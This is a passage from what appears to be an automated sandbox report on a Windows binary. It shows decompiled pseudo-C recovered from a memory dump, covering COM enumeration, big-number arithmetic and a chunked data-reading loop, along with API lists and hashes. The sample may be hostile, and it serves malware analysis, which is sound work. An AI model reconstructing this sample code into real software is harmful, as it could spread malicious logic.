                                                                                                                                                                                                                                                            				_t122 = _t121 - 0x3c;
                                                                                                                                                                                                                                                            				_push( &_v8);
                                                                                                                                                                                                                                                            				_push(__eax);
                                                                                                                                                                                                                                                            				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                                                                            				if(_t117 >= 0) {
                                                                                                                                                                                                                                                            					_t54 = _v8;
                                                                                                                                                                                                                                                            					_t102 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t5 = _t102 + 0x487e038; // 0x3050f485
                                                                                                                                                                                                                                                            					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                                                                            					_t56 = _v8;
                                                                                                                                                                                                                                                            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                                                                            					if(_t117 >= 0) {
                                                                                                                                                                                                                                                            						__imp__#2(0x487c2a8);
                                                                                                                                                                                                                                                            						_v28 = _t57;
                                                                                                                                                                                                                                                            						if(_t57 == 0) {
                                                                                                                                                                                                                                                            							_t117 = 0x8007000e;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t60 = _v32;
                                                                                                                                                                                                                                                            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                                                                            							_t86 = __imp__#6;
                                                                                                                                                                                                                                                            							_t117 = _t61;
                                                                                                                                                                                                                                                            							if(_t117 >= 0) {
                                                                                                                                                                                                                                                            								_t63 = _v24;
                                                                                                                                                                                                                                                            								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                                                                            								if(_t117 >= 0) {
                                                                                                                                                                                                                                                            									_t129 = _v20;
                                                                                                                                                                                                                                                            									if(_t129 != 0) {
                                                                                                                                                                                                                                                            										_v64 = 3;
                                                                                                                                                                                                                                                            										_v48 = 3;
                                                                                                                                                                                                                                                            										_v56 = 0;
                                                                                                                                                                                                                                                            										_v40 = 0;
                                                                                                                                                                                                                                                            										if(_t129 > 0) {
                                                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                                                            												_t67 = _v24;
                                                                                                                                                                                                                                                            												asm("movsd");
                                                                                                                                                                                                                                                            												asm("movsd");
                                                                                                                                                                                                                                                            												asm("movsd");
                                                                                                                                                                                                                                                            												asm("movsd");
                                                                                                                                                                                                                                                            												_t122 = _t122;
                                                                                                                                                                                                                                                            												asm("movsd");
                                                                                                                                                                                                                                                            												asm("movsd");
                                                                                                                                                                                                                                                            												asm("movsd");
                                                                                                                                                                                                                                                            												asm("movsd");
                                                                                                                                                                                                                                                            												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                                                                                                                                                                                                                            												if(_t117 < 0) {
                                                                                                                                                                                                                                                            													goto L16;
                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                            												_t69 = _v8;
                                                                                                                                                                                                                                                            												_t108 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            												_t28 = _t108 + 0x487e0bc; // 0x3050f1ff
                                                                                                                                                                                                                                                            												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                                                                                                                                                                                                                            												if(_t117 >= 0) {
                                                                                                                                                                                                                                                            													_t74 = _v16;
                                                                                                                                                                                                                                                            													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                                                                                                                                                                                                                            													if(_t117 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                                            														_t78 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            														_t33 = _t78 + 0x487e078; // 0x76006f
                                                                                                                                                                                                                                                            														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                                                                            															_t82 = _v16;
                                                                                                                                                                                                                                                            															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                            														 *_t86(_v12);
                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                            													_t76 = _v16;
                                                                                                                                                                                                                                                            													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                            												_t71 = _v8;
                                                                                                                                                                                                                                                            												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                                                                                                                                                            												_v40 = _v40 + 1;
                                                                                                                                                                                                                                                            												if(_v40 < _v20) {
                                                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                            												goto L16;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                                            								_t65 = _v24;
                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							 *_t86(_v28);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t58 = _v32;
                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t117;
                                                                                                                                                                                                                                                            			}




































                                                                                                                                                                                                                                                            0x0487156a
                                                                                                                                                                                                                                                            0x04871573
                                                                                                                                                                                                                                                            0x04871574
                                                                                                                                                                                                                                                            0x04871578
                                                                                                                                                                                                                                                            0x0487157e
                                                                                                                                                                                                                                                            0x04871584
                                                                                                                                                                                                                                                            0x0487158d
                                                                                                                                                                                                                                                            0x04871593
                                                                                                                                                                                                                                                            0x0487159d
                                                                                                                                                                                                                                                            0x0487159f
                                                                                                                                                                                                                                                            0x048715a5
                                                                                                                                                                                                                                                            0x048715aa
                                                                                                                                                                                                                                                            0x048715b5
                                                                                                                                                                                                                                                            0x048715bd
                                                                                                                                                                                                                                                            0x048715c0
                                                                                                                                                                                                                                                            0x048716e3
                                                                                                                                                                                                                                                            0x048715c6
                                                                                                                                                                                                                                                            0x048715c6
                                                                                                                                                                                                                                                            0x048715d3
                                                                                                                                                                                                                                                            0x048715d9
                                                                                                                                                                                                                                                            0x048715df
                                                                                                                                                                                                                                                            0x048715e3
                                                                                                                                                                                                                                                            0x048715e9
                                                                                                                                                                                                                                                            0x048715f6
                                                                                                                                                                                                                                                            0x048715fa
                                                                                                                                                                                                                                                            0x04871600
                                                                                                                                                                                                                                                            0x04871603
                                                                                                                                                                                                                                                            0x04871609
                                                                                                                                                                                                                                                            0x0487160f
                                                                                                                                                                                                                                                            0x04871615
                                                                                                                                                                                                                                                            0x04871618
                                                                                                                                                                                                                                                            0x0487161b
                                                                                                                                                                                                                                                            0x04871621
                                                                                                                                                                                                                                                            0x0487162a
                                                                                                                                                                                                                                                            0x04871630
                                                                                                                                                                                                                                                            0x04871631
                                                                                                                                                                                                                                                            0x04871634
                                                                                                                                                                                                                                                            0x04871635
                                                                                                                                                                                                                                                            0x04871636
                                                                                                                                                                                                                                                            0x0487163e
                                                                                                                                                                                                                                                            0x0487163f
                                                                                                                                                                                                                                                            0x04871640
                                                                                                                                                                                                                                                            0x04871642
                                                                                                                                                                                                                                                            0x04871646
                                                                                                                                                                                                                                                            0x0487164a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04871650
                                                                                                                                                                                                                                                            0x04871659
                                                                                                                                                                                                                                                            0x0487165f
                                                                                                                                                                                                                                                            0x04871669
                                                                                                                                                                                                                                                            0x0487166d
                                                                                                                                                                                                                                                            0x0487166f
                                                                                                                                                                                                                                                            0x0487167c
                                                                                                                                                                                                                                                            0x04871680
                                                                                                                                                                                                                                                            0x04871688
                                                                                                                                                                                                                                                            0x0487168d
                                                                                                                                                                                                                                                            0x0487169f
                                                                                                                                                                                                                                                            0x048716a1
                                                                                                                                                                                                                                                            0x048716a7
                                                                                                                                                                                                                                                            0x048716a7
                                                                                                                                                                                                                                                            0x048716b0
                                                                                                                                                                                                                                                            0x048716b0
                                                                                                                                                                                                                                                            0x048716b2
                                                                                                                                                                                                                                                            0x048716b8
                                                                                                                                                                                                                                                            0x048716b8
                                                                                                                                                                                                                                                            0x048716bb
                                                                                                                                                                                                                                                            0x048716c1
                                                                                                                                                                                                                                                            0x048716c4
                                                                                                                                                                                                                                                            0x048716cd
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048716cd
                                                                                                                                                                                                                                                            0x04871621
                                                                                                                                                                                                                                                            0x0487161b
                                                                                                                                                                                                                                                            0x04871603
                                                                                                                                                                                                                                                            0x048716d3
                                                                                                                                                                                                                                                            0x048716d3
                                                                                                                                                                                                                                                            0x048716d9
                                                                                                                                                                                                                                                            0x048716d9
                                                                                                                                                                                                                                                            0x048716df
                                                                                                                                                                                                                                                            0x048716df
                                                                                                                                                                                                                                                            0x048716e8
                                                                                                                                                                                                                                                            0x048716ee
                                                                                                                                                                                                                                                            0x048716ee
                                                                                                                                                                                                                                                            0x048715aa
                                                                                                                                                                                                                                                            0x048716f7

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(0487C2A8), ref: 048715B5
                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04871697
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 048716B0
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 048716DF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1885612795-0
                                                                                                                                                                                                                                                            • Opcode ID: bede02e6af6468c48c85242411c55181af856bc7c2968ac104ca5ef56d787f06
                                                                                                                                                                                                                                                            • Instruction ID: 401213432b868992a67ef12d7ede1d0b06de71e7ef62a1a0546ad640bbeb22fa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bede02e6af6468c48c85242411c55181af856bc7c2968ac104ca5ef56d787f06
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C511C75D00519DFCB10DFA8C8989AEB7BAFF89704B148A98E915EB310D771ED41CBA0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                                                            			E048745A6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                            				void _v92;
                                                                                                                                                                                                                                                            				void _v236;
                                                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                                                            				unsigned int _t56;
                                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                            				signed int* _t99;
                                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                                            				signed int _t103;
                                                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t92 = _a12;
                                                                                                                                                                                                                                                            				_t101 = __eax;
                                                                                                                                                                                                                                                            				_t55 = E04871554(_a16, _t92);
                                                                                                                                                                                                                                                            				_t79 = _t55;
                                                                                                                                                                                                                                                            				if(_t79 == 0) {
                                                                                                                                                                                                                                                            					L18:
                                                                                                                                                                                                                                                            					return _t55;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                                                            				_t81 = 0;
                                                                                                                                                                                                                                                            				_t96 = 0x20;
                                                                                                                                                                                                                                                            				if(_t56 == 0) {
                                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                                            					_t97 = _t96 - _t81;
                                                                                                                                                                                                                                                            					_v12 = _t96 - _t81;
                                                                                                                                                                                                                                                            					E04874062(_t79,  &_v236);
                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04879C13(_t101,  &_v236, _a8, _t96 - _t81);
                                                                                                                                                                                                                                                            					E04879C13(_t79,  &_v92, _a12, _t97);
                                                                                                                                                                                                                                                            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                                                                                                                                                                                                                            					_t66 = E04874062(_t101, 0x487d1b0);
                                                                                                                                                                                                                                                            					_t103 = _t101 - _t79;
                                                                                                                                                                                                                                                            					_a8 = _t103;
                                                                                                                                                                                                                                                            					if(_t103 < 0) {
                                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                                            						E04874062(_a16, _a4);
                                                                                                                                                                                                                                                            						E04871AF1(_t79,  &_v236, _a4, _t97);
                                                                                                                                                                                                                                                            						memset( &_v236, 0, 0x8c);
                                                                                                                                                                                                                                                            						_t55 = memset( &_v92, 0, 0x44);
                                                                                                                                                                                                                                                            						goto L18;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                            						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                            							_push(1);
                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                            							_push( *_t99);
                                                                                                                                                                                                                                                            							L0487B078();
                                                                                                                                                                                                                                                            							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                                                            							asm("adc edx, esi");
                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                            							_push(_v8 + 1);
                                                                                                                                                                                                                                                            							_push(_t92);
                                                                                                                                                                                                                                                            							_push(_t74);
                                                                                                                                                                                                                                                            							L0487B072();
                                                                                                                                                                                                                                                            							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                                                            								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                                                            								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t74 =  *_t99;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                                                                                                                                                                                                                            						_a12 = _t74;
                                                                                                                                                                                                                                                            						_t76 = E04877D59(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                            							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                                            							if( *_t99 != 0) {
                                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							L13:
                                                                                                                                                                                                                                                            							_t92 =  &_v92;
                                                                                                                                                                                                                                                            							if(E04879FF1(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                                            							_a12 = _a12 + 1;
                                                                                                                                                                                                                                                            							_t76 = E04878B43(_t79,  &_v92, _t106, _t106);
                                                                                                                                                                                                                                                            							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                                            							if( *_t99 != 0) {
                                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_a8 = _a8 - 1;
                                                                                                                                                                                                                                                            						_t66 = _a12;
                                                                                                                                                                                                                                                            						_t99 = _t99 - 4;
                                                                                                                                                                                                                                                            						 *(0x487d1b0 + _a8 * 4) = _t66;
                                                                                                                                                                                                                                                            					} while (_a8 >= 0);
                                                                                                                                                                                                                                                            					_t97 = _v12;
                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				while(_t81 < _t96) {
                                                                                                                                                                                                                                                            					_t81 = _t81 + 1;
                                                                                                                                                                                                                                                            					_t56 = _t56 >> 1;
                                                                                                                                                                                                                                                            					if(_t56 != 0) {
                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                                            0x048745a9
                                                                                                                                                                                                                                                            0x048745b5
                                                                                                                                                                                                                                                            0x048745bb
                                                                                                                                                                                                                                                            0x048745c0
                                                                                                                                                                                                                                                            0x048745c4
                                                                                                                                                                                                                                                            0x04874721
                                                                                                                                                                                                                                                            0x04874725
                                                                                                                                                                                                                                                            0x04874725
                                                                                                                                                                                                                                                            0x048745ca
                                                                                                                                                                                                                                                            0x048745ce
                                                                                                                                                                                                                                                            0x048745d4
                                                                                                                                                                                                                                                            0x048745d5
                                                                                                                                                                                                                                                            0x048745e0
                                                                                                                                                                                                                                                            0x048745e6
                                                                                                                                                                                                                                                            0x048745eb
                                                                                                                                                                                                                                                            0x048745ee
                                                                                                                                                                                                                                                            0x04874608
                                                                                                                                                                                                                                                            0x04874614
                                                                                                                                                                                                                                                            0x0487461d
                                                                                                                                                                                                                                                            0x04874627
                                                                                                                                                                                                                                                            0x0487462c
                                                                                                                                                                                                                                                            0x0487462e
                                                                                                                                                                                                                                                            0x04874631
                                                                                                                                                                                                                                                            0x048746df
                                                                                                                                                                                                                                                            0x048746e5
                                                                                                                                                                                                                                                            0x048746f6
                                                                                                                                                                                                                                                            0x04874709
                                                                                                                                                                                                                                                            0x04874719
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487471e
                                                                                                                                                                                                                                                            0x0487463a
                                                                                                                                                                                                                                                            0x04874641
                                                                                                                                                                                                                                                            0x04874645
                                                                                                                                                                                                                                                            0x0487464b
                                                                                                                                                                                                                                                            0x0487464d
                                                                                                                                                                                                                                                            0x0487464f
                                                                                                                                                                                                                                                            0x04874651
                                                                                                                                                                                                                                                            0x04874653
                                                                                                                                                                                                                                                            0x0487465d
                                                                                                                                                                                                                                                            0x04874662
                                                                                                                                                                                                                                                            0x04874664
                                                                                                                                                                                                                                                            0x04874666
                                                                                                                                                                                                                                                            0x04874667
                                                                                                                                                                                                                                                            0x04874668
                                                                                                                                                                                                                                                            0x04874669
                                                                                                                                                                                                                                                            0x04874670
                                                                                                                                                                                                                                                            0x04874677
                                                                                                                                                                                                                                                            0x0487467a
                                                                                                                                                                                                                                                            0x0487467a
                                                                                                                                                                                                                                                            0x04874647
                                                                                                                                                                                                                                                            0x04874647
                                                                                                                                                                                                                                                            0x04874647
                                                                                                                                                                                                                                                            0x04874682
                                                                                                                                                                                                                                                            0x0487468a
                                                                                                                                                                                                                                                            0x04874693
                                                                                                                                                                                                                                                            0x04874698
                                                                                                                                                                                                                                                            0x04874698
                                                                                                                                                                                                                                                            0x0487469d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487469f
                                                                                                                                                                                                                                                            0x048746a2
                                                                                                                                                                                                                                                            0x048746ac
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048746ae
                                                                                                                                                                                                                                                            0x048746ae
                                                                                                                                                                                                                                                            0x048746b8
                                                                                                                                                                                                                                                            0x04874698
                                                                                                                                                                                                                                                            0x0487469d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487469d
                                                                                                                                                                                                                                                            0x048746c2
                                                                                                                                                                                                                                                            0x048746c5
                                                                                                                                                                                                                                                            0x048746c8
                                                                                                                                                                                                                                                            0x048746cf
                                                                                                                                                                                                                                                            0x048746cf
                                                                                                                                                                                                                                                            0x048746dc
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048746dc
                                                                                                                                                                                                                                                            0x048745d7
                                                                                                                                                                                                                                                            0x048745db
                                                                                                                                                                                                                                                            0x048745dc
                                                                                                                                                                                                                                                            0x048745de
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048745de
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04874653
                                                                                                                                                                                                                                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04874669
                                                                                                                                                                                                                                                            • memset.NTDLL ref: 04874709
                                                                                                                                                                                                                                                            • memset.NTDLL ref: 04874719
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3041852380-0
                                                                                                                                                                                                                                                            • Opcode ID: 3e38009454a177b8ef361a6411cebcd3c3670e716b66ad464b4e7a008082b721
                                                                                                                                                                                                                                                            • Instruction ID: 9a8c510c802105137c3ad261f5005ddbd0292e889aec933a2a6a2d85f449c05e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e38009454a177b8ef361a6411cebcd3c3670e716b66ad464b4e7a008082b721
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A419471600219ABEB10EFACCC94BDE7775EF45714F108E29E916E7180EBB0F9548B51
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,00000008,73B74D40), ref: 0487A969
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(?), ref: 0487A9DD
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0487AA00
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0487AAAB
                                                                                                                                                                                                                                                              • Part of subcall function 048770FF: HeapFree.KERNEL32(00000000,00000000,04871545,00000000,?,?,00000000), ref: 0487710B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 943265810-0
                                                                                                                                                                                                                                                            • Opcode ID: 424b56898b8bf43d8201b1d66af5d05f970aa78a5b5b05aa2799294ea94e50b6
                                                                                                                                                                                                                                                            • Instruction ID: aa9cf1758e09f1c39b2fd12b431e08e15f672ba5895d5452789a972c8630950a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 424b56898b8bf43d8201b1d66af5d05f970aa78a5b5b05aa2799294ea94e50b6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F414971600204BFD7259FA5DD68E6FBBBDEF85744B004E29F102E2091E775E985DB20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 42%
                                                                                                                                                                                                                                                            			E04876D04(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                                            				intOrPtr* _t41;
                                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t58 = __ecx;
                                                                                                                                                                                                                                                            				_t67 = __eax;
                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                            					_t30 = _t67;
                                                                                                                                                                                                                                                            					_pop(_t68);
                                                                                                                                                                                                                                                            					_t69 = _t30;
                                                                                                                                                                                                                                                            					_t64 = 0;
                                                                                                                                                                                                                                                            					ResetEvent( *(_t69 + 0x1c));
                                                                                                                                                                                                                                                            					_push( &_v8);
                                                                                                                                                                                                                                                            					_push(4);
                                                                                                                                                                                                                                                            					_push( &_v20);
                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                                                                                                                                                                                                                            					if( *0x487d140() != 0) {
                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                            						if(_v8 == 0) {
                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							 *0x487d168(0, 1,  &_v12);
                                                                                                                                                                                                                                                            							if(0 != 0) {
                                                                                                                                                                                                                                                            								_t64 = 8;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t38 = E048716F8(0x1000);
                                                                                                                                                                                                                                                            								_v16 = _t38;
                                                                                                                                                                                                                                                            								if(_t38 == 0) {
                                                                                                                                                                                                                                                            									_t64 = 8;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                                            									_push(_v8);
                                                                                                                                                                                                                                                            									_push( &_v20);
                                                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                                                            										_t41 = _v12;
                                                                                                                                                                                                                                                            										_t61 =  *_t41;
                                                                                                                                                                                                                                                            										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                                                                                                                                                                                                                            										ResetEvent( *(_t69 + 0x1c));
                                                                                                                                                                                                                                                            										_push( &_v8);
                                                                                                                                                                                                                                                            										_push(0x1000);
                                                                                                                                                                                                                                                            										_push(_v16);
                                                                                                                                                                                                                                                            										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                                                                                                                                                                                                                            										if( *0x487d140() != 0) {
                                                                                                                                                                                                                                                            											goto L17;
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										_t64 = GetLastError();
                                                                                                                                                                                                                                                            										if(_t64 == 0x3e5) {
                                                                                                                                                                                                                                                            											_t64 = E048782BE( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                                                                                                                                                                                                                            											if(_t64 == 0) {
                                                                                                                                                                                                                                                            												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                                                                                                                                                                                                                            												if(_t64 == 0) {
                                                                                                                                                                                                                                                            													goto L17;
